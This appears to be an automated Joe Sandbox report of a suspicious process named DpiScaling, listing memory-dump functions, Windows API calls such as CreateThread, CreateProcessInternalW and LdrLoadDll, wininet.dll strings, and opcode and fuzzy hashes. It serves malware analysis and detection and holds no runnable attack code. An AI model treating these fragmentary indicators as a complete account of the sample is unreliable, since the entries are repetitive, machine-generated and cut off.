Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48b948bc3c10c39b02f6ed5b86496cd4400ab94c38ce95285ccf2a7df77a97d9
Instruction ID: cb735fbb4a8262a4f569b3025ce3cf72f78815a6af3a80434eaab833fd88cac6
Opcode Fuzzy Hash: 48b948bc3c10c39b02f6ed5b86496cd4400ab94c38ce95285ccf2a7df77a97d9
Instruction Fuzzy Hash: 8A9002A120280407F1807558480470700058BD0307F55C511A70B9555E8A29DD956136

Function 04852FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852FBA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27506ce6df020adb4296231f1bd713113df6daf3c74bfa013cf56f5bb87ecab1
Instruction ID: 618e9261ff0325f57967929cb2f69aef1bd1f7d5f31526e6147d4ade664e7348
Opcode Fuzzy Hash: 27506ce6df020adb4296231f1bd713113df6daf3c74bfa013cf56f5bb87ecab1
Instruction Fuzzy Hash: BB90026160240046618071688844A064005AFE1216755C621A59ED550D8559D9A95666

Function 04852FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852FEA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2dcc94eb393ecb6270976d00dc4b232f2d15c71118cd60b9398707687a8dc301
Instruction ID: e34dd64c7c5fc3ba4bebceee904e58387cd1891f5b9b2c38d32e5e3e208feea4
Opcode Fuzzy Hash: 2dcc94eb393ecb6270976d00dc4b232f2d15c71118cd60b9398707687a8dc301
Instruction Fuzzy Hash: CF900261212C0046F24075684C14B0700058BD0307F55C615A51A9554CC915D9A55522

Function 04852F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852F3A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e71093349d9739107fbdc27f69e0e9a455ae403811daea2c16b293996c6fe536
Instruction ID: 0c9f14e77a06697bd1f8ad4c75f5692bf021898253d631dcc52abbfb70c5a756
Opcode Fuzzy Hash: e71093349d9739107fbdc27f69e0e9a455ae403811daea2c16b293996c6fe536
Instruction Fuzzy Hash: 5B9002A134240446F14071584414B060005CBE1306F55C515E60B9554D8619DD966127

Function 04852AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852ADA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dcd4e4a992e91abf775d2ee8d8bd2ae0973f8cf21a9fc3c03fae8b21c5afaac1
Instruction ID: a5bb611463ca1bdbae6d361d02eac3591f83d21f7e30d3c850dc8ce9a250f198
Opcode Fuzzy Hash: dcd4e4a992e91abf775d2ee8d8bd2ae0973f8cf21a9fc3c03fae8b21c5afaac1
Instruction Fuzzy Hash: 53900265212400072145B558070460700468BD5356355C521F606A550CD621D9A55122

Function 04852AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852AFA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e43b0ef82917533a711965e6df6dae59e1314da5f11d624cda45ed6bfbf8b31
Instruction ID: cca02a64bf64a362b613dc8d00c35f873a20c23fd2ba5713e63ee2eaf034365a
Opcode Fuzzy Hash: 4e43b0ef82917533a711965e6df6dae59e1314da5f11d624cda45ed6bfbf8b31
Instruction Fuzzy Hash: F3900265222400062185B558060460B04459BD6356395C515F646B590CC621D9A95322

Function 04852BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852BAA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a239cdd04b266f7681b8414739759460bd156d165c22ac409a4d08886c3424d
Instruction ID: b1256eb3e3c2b47640e508dc2d2e45f8dcbeac59798a9be675ab8775cfe8759b
Opcode Fuzzy Hash: 0a239cdd04b266f7681b8414739759460bd156d165c22ac409a4d08886c3424d
Instruction Fuzzy Hash: 4090027160640806F1907158441474600058BD0306F55C511A5079654D8755DB9976A2

Function 04852BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852BEA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22cefb17a848801635a2c00f87db8311c8271264d4335a90d4208b66bbebca4c
Instruction ID: c54c4f02d040c7075c5475f1b0c4a5a0f49ab73efedc338e11bc61aecf509627
Opcode Fuzzy Hash: 22cefb17a848801635a2c00f87db8311c8271264d4335a90d4208b66bbebca4c
Instruction Fuzzy Hash: 8390027120644846F18071584404B4600158BD030AF55C511A50B9694D9625DE99B662

Function 04852BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852BFA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 02efcfa6a4fec5af29414432ed53e49f1f2793c20ef8e85313756556529f26e1
Instruction ID: 43482b5bad51124a813d7304a4b55be4b31607623597c93378228dc750d5d459
Opcode Fuzzy Hash: 02efcfa6a4fec5af29414432ed53e49f1f2793c20ef8e85313756556529f26e1
Instruction Fuzzy Hash: 6690027120240806F1C07158440474A00058BD1306F95C515A507A654DCA15DB9D77A2

Function 04852B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852B6A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a05fd234709ae741bd63ed42f827d625703726f91d7f7c31140a8497d6d1787a
Instruction ID: cb18e8cee9a967f3e3ed7ff0edf177874ffbe6209299860297509393ad53f869
Opcode Fuzzy Hash: a05fd234709ae741bd63ed42f827d625703726f91d7f7c31140a8497d6d1787a
Instruction Fuzzy Hash: 299002A120340007614571584414716400A8BE0206B55C521E6069590DC525D9D56126

Function 048535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048535CA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d75d193aa16f9cd142f41cc1c8dc7ebe31f928351daf5ee5dbcacd1f086c1fcd
Instruction ID: 625080683abac1c6578f62974fab9594fb3a51ac530af8a94b49bef271507647
Opcode Fuzzy Hash: d75d193aa16f9cd142f41cc1c8dc7ebe31f928351daf5ee5dbcacd1f086c1fcd
Instruction Fuzzy Hash: E690027160650406F1407158451470610058BD0206F65C911A5479568D8795DA9565A3

Function 048539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 048539BA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f4b4dcfd336fe11c8af9571cbc5234c6f5268fe733449b1f1fb912cec923066
Instruction ID: 8536770e99536fd417022114f217a2847922e59f11a1a6ba4e632ebb2a630729
Opcode Fuzzy Hash: 1f4b4dcfd336fe11c8af9571cbc5234c6f5268fe733449b1f1fb912cec923066
Instruction Fuzzy Hash: 7590026124645106F190715C44047164005ABE0206F55C521A5869594D8555D9996222

Function 00619EF6 Relevance: 68.4, APIs: 1, Strings: 38, Instructions: 183
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00619EE5

Strings

fw, xrefs: 0061A20E
y, xrefs: 0061A0BF
D[, xrefs: 0061A1D5
Y, xrefs: 0061A0B5
XK, xrefs: 0061A187
&3, xrefs: 0061A15F
DN, xrefs: 00619F2E
+, xrefs: 0061A097
<, xrefs: 0061A2F0
2, xrefs: 0061A318
w+, xrefs: 0061A284
(, xrefs: 0061A2A0
E&, xrefs: 00619F53
W+, xrefs: 0061A2DF
|?, xrefs: 0061A1DC
B, xrefs: 0061A04F
5?, xrefs: 00619F1A
A, xrefs: 0061A204
sP, xrefs: 0061A123
L6, xrefs: 0061A191
v, xrefs: 00619F89
lK, xrefs: 0061A077
Ei, xrefs: 00619F3F
,}, xrefs: 0061A254
-Y, xrefs: 0061A119
Y~, xrefs: 0061A33F
]>, xrefs: 00619FE7
nT, xrefs: 0061A1F0
hh, xrefs: 0061A10F
aK, xrefs: 0061A28B
@, xrefs: 00619F6B
(Y, xrefs: 0061A218
P0, xrefs: 00619FD3
}, xrefs: 0061A37A
g/, xrefs: 0061A0FB
!, xrefs: 0061A370
S>, xrefs: 0061A1A5
R, xrefs: 00619F75

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ($!$&3$(Y$+$,}$-Y$2$5?$<$@$B$DN$D[$E&$Ei$L6$P0$R$S>$W+$XK$Y$Y~$]>$aK$fw$g/$hh$lK$nT$sP$v$w+$y$|?$}$A
API String ID: 2422867632-1221118759
Opcode ID: 140ffab47216fe8c4f2db974be672e91c492dcd6873cbe975c12394e1d87ba73
Instruction ID: ac27be9d20cb6646aa93a194f55b657ba983649c380a36dfbe53e93b1c0c257d
Opcode Fuzzy Hash: 140ffab47216fe8c4f2db974be672e91c492dcd6873cbe975c12394e1d87ba73
Instruction Fuzzy Hash: 68C168B0D057698BEB60CF41CD987DEBAB1BB05308F1081D9D15D3B281CBBA1A89CF85

Function 00634230 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 0063430B

Strings

net.dll, xrefs: 006342C7, 00634356, 00634336, 00634342, 00634362
wininet.dll, xrefs: 0063429E, 006342AA

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 99f7a74124d33cefbeed0677e6789f5b7c70bb3758200ea244cef2f241e80bc8
Instruction ID: 9b4dd6637c7243ec42c216113f8e9b30dbeb5d5a2f2e7fafcff5691f1c195292
Opcode Fuzzy Hash: 99f7a74124d33cefbeed0677e6789f5b7c70bb3758200ea244cef2f241e80bc8
Instruction Fuzzy Hash: A4317AB1A01705BBD714DFA4D885FEABBB9EB88310F10851CF61DAB241DA746A408BE4

Function 0062FCF9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0062FD17
CoUninitialize.COMBASE ref: 0062FDFE

Strings

@J7<, xrefs: 0062FD2B

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 3d224e7d566675a3f7b763456524aeda7fc70de07abc4f24a7b2efe32419c9cf
Instruction ID: 47703649b1ac7a1a87f3347e72041673386c631f0afff4afb93aa9d35ea1e6c8
Opcode Fuzzy Hash: 3d224e7d566675a3f7b763456524aeda7fc70de07abc4f24a7b2efe32419c9cf
Instruction Fuzzy Hash: 963102B5A0061A9FDB00DFD8D8809EFB7BAFF48304B108569E515E7214D775EE458BA0

Function 0062FD00 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0062FD17
CoUninitialize.COMBASE ref: 0062FDFE

Strings

@J7<, xrefs: 0062FD2B

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 4349142448911fd2e9266d6ccb03632ceac4a4103d81b4681d9751dbcd21cbc5
Instruction ID: 3983accf750d0a714e348cd6a053c0c333b573e856a9f583eaaf94ad71cd192f
Opcode Fuzzy Hash: 4349142448911fd2e9266d6ccb03632ceac4a4103d81b4681d9751dbcd21cbc5
Instruction Fuzzy Hash: F6310175A0061A9FDB00DFD8D8809EEB7BAFF88304B108569E515A7214D775EE458BA0

Function 00639F90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00622289,?,o`c,00622289,00635E1F,0063606F,?,00622289,00635E1F,00001000,?,?,00000000), ref: 00639FCF

Strings

o`c, xrefs: 00639FBE, 00639FCA

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: o`c
API String ID: 1279760036-227282506
Opcode ID: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction ID: 24b45dc49c7bef97da9228b7d39be16c03ddb9c67a4d62c5d827ad98368e2ee8
Opcode Fuzzy Hash: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction Fuzzy Hash: 9DE06DB22042047BD614EF58DC45F9B37ADEFC9710F004519FA08A7242CA30B81087B9

Function 00624D90 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00624E02

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction ID: a2a1ea397a89f264b0b905477386d31193f54b7831418eb284841a6c79bc25e4
Opcode Fuzzy Hash: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction Fuzzy Hash: 5F011EB5D0020DABDF50DAE4EC42FDDB3B99F54308F004599E908A7281FA31EB148B91

Function 0063A070 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,00628B7E,00000010,?,?,?,00000044,?,00000010,00628B7E,?,?,?), ref: 0063A0D0

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 01cd064d6552d5f2cf89f5c8ba85a2642588893491891f8a1591fcff336c04c6
Instruction ID: a24f4ad9350ffa512a1c9bede187dc6209dadba2eb639745b6a4c5f2eff00cc8
Opcode Fuzzy Hash: 01cd064d6552d5f2cf89f5c8ba85a2642588893491891f8a1591fcff336c04c6
Instruction Fuzzy Hash: 0D0184B6204208BBCB44DF99DC81EDB77ADEF8C754F418208BA0DD7241D630F8518BA4

Function 00619EA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00619EE5

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: b31fc47a371062e07bb7fe1983d695cd862d38e137e2d673d4986b5b4ddaad53
Instruction ID: bd68a79b3d70bbacc01b45d7b0da5e72ae3244662a4f8aa7e5cfbb1c6d14313c
Opcode Fuzzy Hash: b31fc47a371062e07bb7fe1983d695cd862d38e137e2d673d4986b5b4ddaad53
Instruction Fuzzy Hash: 60F06D333803043AE26075A9AC42FD7B69DCB80B61F14042AF70CEB2C1D9A5B94182E8

Function 00619E9A Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00619EE5

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 42446eb84e7ba486e32cc88a68cdd13209811338d34c734360c86a6a4f47cb54
Instruction ID: 9ef8b5d67145d31aa14111e1982d9ec694a6601879e610fc66959ea62b9a643f
Opcode Fuzzy Hash: 42446eb84e7ba486e32cc88a68cdd13209811338d34c734360c86a6a4f47cb54
Instruction Fuzzy Hash: 2BF0653364030436E37166959C43FDBB69D9F85B50F140419F708AB2C1D9A5B94187E8

Function 00639FE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,20F845C7,00000007,00000000,00000004,00000000,00624612,000000F4), ref: 0063A01F

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction ID: ee426c27b61c04b453ecac6bf82018a7e411a7db79336b5adeeda44e2d7852af
Opcode Fuzzy Hash: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction Fuzzy Hash: 9BE06DB12043047BD614EF59DC41EDB33ADEFC5710F404418FA09A7241CA31B81186B9

Function 00628BC0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00628BEC

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c58293d32bd8147a900389bab75c9f72820fd2597aa2a7c120c298130393e55a
Instruction ID: 68843ad74f736fd14c2e3bb42464e3c3f8dad59d1cb7505f3f9898baf2f7958c
Opcode Fuzzy Hash: c58293d32bd8147a900389bab75c9f72820fd2597aa2a7c120c298130393e55a
Instruction Fuzzy Hash: A9E020B91407041BF720696CEC45FB13349D768724F048654BC1CDF3D1D93CF9018554

Function 00628BB9 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00628BEC

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 417835fad04071081e364a1894cc7fe6599d9c3284dc07572dd3f426e4a491b3
Instruction ID: 2de2058ebfcde7c3dea6dc6f5bf34b7bb2f1951326f554fb5794b230e4fe65b7
Opcode Fuzzy Hash: 417835fad04071081e364a1894cc7fe6599d9c3284dc07572dd3f426e4a491b3
Instruction Fuzzy Hash: 37E0D8BD5413142BE7206A68DC46FB53355DB68710F048614BC1C9F3D1E978FA428654

Function 006289AF Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00622580,0063875F,00635E1F,0062254D), ref: 006289E3

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c6acb38f5202aee68efdfd7af0fdb8825127a1c4e3bae3978b40d1703d33cdbe
Instruction ID: 589e679dedd70042ef910b1bcfc021b09a724c77a8f6a74114dba5dfc04bc6d1
Opcode Fuzzy Hash: c6acb38f5202aee68efdfd7af0fdb8825127a1c4e3bae3978b40d1703d33cdbe
Instruction Fuzzy Hash: 61D02BB16883003EF740E6B49C03FA5268D4B10700F04406CF50CEB3C3D898A5408A15

Function 006289B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00622580,0063875F,00635E1F,0062254D), ref: 006289E3

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0e4c63df192a151cd85b9786be853329b84476a27646d05024dcba02b158ed13
Instruction ID: 42381f0d5ce8c24e763bf6b0c0d16f63bd919f49601f27532506554c39ca9525
Opcode Fuzzy Hash: 0e4c63df192a151cd85b9786be853329b84476a27646d05024dcba02b158ed13
Instruction Fuzzy Hash: 62D05EB16843043BF640A6A4DC07F66368E9B10B54F058068BA0CEB3C2ECA9F59086A9

Function 0062165B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111), ref: 00621667

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
